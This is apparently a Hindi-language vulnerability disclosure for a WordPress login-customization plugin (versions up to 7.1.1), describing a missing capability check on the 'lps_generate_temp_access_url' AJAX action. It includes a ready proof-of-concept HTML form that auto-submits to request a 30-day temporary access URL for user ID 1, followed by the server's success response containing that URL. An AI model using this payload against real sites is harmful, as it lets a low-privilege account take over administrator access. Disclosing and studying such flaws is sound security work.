
ALL In One Custom Login Page <= 7.1.1 - प्रमाणित (सब्सक्राइबर+) उपयोगकर्ताओं के लिए अनुमोदन की कमी से विशेषाधिकार वृद्धि
ALL In One Custom Login Page <= 7.1.1 - प्रमाणित (Subscriber+) उपयोगकर्ताओं के लिए लापता प्राधिकरण जाँच के कारण विशेषाधिकार वृद्धि
Custom Login Page Styler – लॉगिन संरक्षित निजी साइट, wp-admin लॉगिन URL बदलें, WordPress लॉगिन लोगो, अस्थायी व्यवस्थापक लॉगिन पहुँच, लॉगिन का नाम बदलें, लॉगिन कस्टमाइज़र, wp-login छिपाएँ – लॉगिन प्रयास सीमित करें – लॉक्ड साइट नामक WordPress प्लगइन, 'lps_generate_temp_access_url' AJAX क्रिया पर क्षमता जाँच (capability check) की कमी के कारण 7.1.1 तक के सभी संस्करणों में विशेषाधिकार वृद्धि की भेद्यता से ग्रस्त है। यह प्रमाणित हमलावरों को, जिनके पास सब्सक्राइबर-स्तर या उससे ऊपर की पहुँच है, सब्सक्राइबर जैसे अन्य उपयोगकर्ताओं के रूप में लॉगिन करना संभव बनाता है।
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="lps_generate_temp_access_url" />
<input type="hidden" name="user_id" value="1" />
<input type="hidden" name="expiration_time" value="2592000" />
<input type="hidden" name="nonce" value="90cc73ad2a" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
{"success":true,"data":{"temp_url":"https:\/\/wp-dev.ddev.site?temp_access=Osn6apJoSJunYNqOhDsn&user_id=1","message":"Temporary access URL created successfully for 30 Day(s)."}}